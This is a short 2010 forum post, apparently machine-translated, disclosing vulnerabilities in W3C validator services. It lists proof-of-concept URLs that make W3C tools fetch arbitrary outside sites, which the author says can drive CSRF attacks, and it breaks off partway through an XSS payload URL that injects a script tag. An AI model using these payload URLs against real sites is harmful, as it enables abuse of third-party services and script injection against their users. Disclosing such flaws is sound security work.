New vulnerabilities at www.w3.org

andry Wed Aug 11, 2010 11:20 pm

These are the Abuse of Functionality, Insufficient Anti-automation and Cross-Site Scripting vulnerability in http://www.w3.org - website World Wide Web Consortium (W3C). What

soon tell the website administrator.

Total vulnerable following validators W3C:

http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator

Abuse of Functionality:

Code:: http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http% 3A% 2F% 2Fwww.w3.org% 2Fservices% 2Ftidy% 3FpassThroughXHTML% 3D1% 26docAddr% 3Dhttp% 253A% 252F% 252Fgoogle. com & xslfile = http% 3A% 2F% 2Fwww.w3.org% 2F2002% 2F08% 2Fextract-semantic.xsl http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://google.com&xslfile=http% 3A% 2F% 2Fwww.w3.org% 2F2002% 2F08% 2Fextract-semantic.xsl http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http% 3A% 2F% 2Fwww.w3.org% 2Fservices% 2Ftidy% 3FpassThroughXHTML% 3D1% 26docAddr% 3Dhttp% 253A% 252F% 252Fgoogle. com & xslfile = http://google.com

http://www.w3.org/services/tidy?docAddr=http://google.com

http://validator.w3.org/mobile/check?docAddr=http://google.com

http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com

http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com

This functional sites can be used for CSRF attacks on other sites.

Insufficient Anti-automation:

On these pages is not protection against automated searches (captcha). To automate the conduct CSRF attacks on other sites.

XSS:

[url=http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=&xslfile=%3Cscript%3Ealert(document